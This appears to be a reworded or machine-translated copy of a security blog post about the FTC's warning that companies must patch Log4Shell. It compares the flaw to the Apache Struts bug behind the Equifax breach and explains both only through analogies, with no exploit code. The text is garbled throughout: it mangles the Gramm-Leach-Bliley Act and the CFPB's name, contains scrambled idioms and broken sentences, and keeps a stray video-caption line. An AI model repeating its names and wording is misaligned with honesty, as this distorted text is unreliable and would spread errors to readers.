The Federal Trade Commission (FTC) is the consumer rights agency in the United States, and it will enter 2022 with a loud noise instead of a whimper.
Use the infamous Log4Shell vulnerability as what you might say Annex A, The Federal Trade Commission has Fired a shot at the bow Companies in the U.S. jurisdictions tell them to fix them in order, otherwise they will face consequences:
Companies that rely on Log4j and their suppliers are now critical to taking action to reduce the possibility of harm to consumers and avoid legal action by the FTC.
Of course, it is not just Log4j that created the legal obligation to do the right thing to protect consumers. The FTC reminds us all:
When vulnerabilities are discovered and exploited, it may cause loss or disclosure of personal information, economic losses and other irreversible harm. Taking reasonable steps to reduce the liability for known software vulnerabilities involves laws, including the Federal Trade Commission Act and the Gram Ritchie Blilly Act.
In other words, even if your company itself may be the victim of a crime, it does not free you from your civil or criminal liability.
Simply put: if you can reasonably take preventive measures against data breaches, and people would reasonably expect you to take them, but you don’t…
…Then you may end up being both the victim and the perpetrator at the same time.
FTC did this before
The FTC’s short and straightforward warning is an example of the infamous Equifax vulnerability in 2017, when the US credit reporting giant was compromised through an unpatched Apache Struts vulnerability and the humble error identifier CVE-2017-5638.
The personal information of nearly 150 million people was exposed as a result.
The FTC keenly reminded us that Equifax eventually paid $700 million to resolve the subsequent legal actions taken by the FTC itself, the U.S. Consumer Financial Protection Agency, and all 50 states in the United States.
The FTC also made it clear that it is also very happy to bring charges against future offenders:
The FTC intends to use all its legal powers to pursue companies that fail to take reasonable measures to protect consumer data from Log4j or similar known vulnerabilities in the future.
Already seen again
Interestingly, it is found that Equifax’s Apache Struts vulnerability has many similarities with the Log4Shell security vulnerability in Apache’s Log4j logging code.
The CVE-2017-5638 Struts vulnerability is exploitable because unimportant text data in an untrusted web request may contain a “magic character sequence” that is regarded as a mini program at the other end.
Instead of saying “The data I just sent you is in this format: text/plain“You can say something like: “The data I just sent you is: (Hey, run this completely untrusted short text string as a program fragment to find out what type it is)”.
Like Log4j’s Log4Shell vulnerability, this vulnerability was originally designed as a feature to provide flexible code for your back-end business logic programmers, while inadvertently providing cybercriminal attackers with an exploitable backdoor vulnerability for Remote code execution.
The official name of the Log4j error is CVE-2021-44228, but it is usually called Log4Shell, which is even worse.
The logging toolkit erroneously allows crooks not only to say “The data I want you to log is: this text here“, but you can also embed log instructions, such as: “The data I want you to record is: (Hey, here is a website where you can find a program that may or may not tell you, so please Download it yourself and run it for me)”.
If you can’t read the text in the video clearly here, try using full screen mode, or Watch directly On YouTube. Click the gear in the video player to speed up playback or turn on subtitles.
what to do?
If you still adhere to the 1999-style patch policy, which relies on companies that are better prepared for cybersecurity first, watch carefully on the sidelines, and then wait a few days (days, weeks, months) for you The change control committee weighs the pros and cons…
…You may need to let your change control board approve the change of the change control board itself.
The FTC is essentially warning companies and suppliers that some vulnerabilities and patches are very important, and there is no room left. Lead, follow, or get out of; Only space lead.
What Naked Security himself often repeats: Patch early, patch often…
…Your customers (and regulatory agencies in your country/region) will respect you for this!
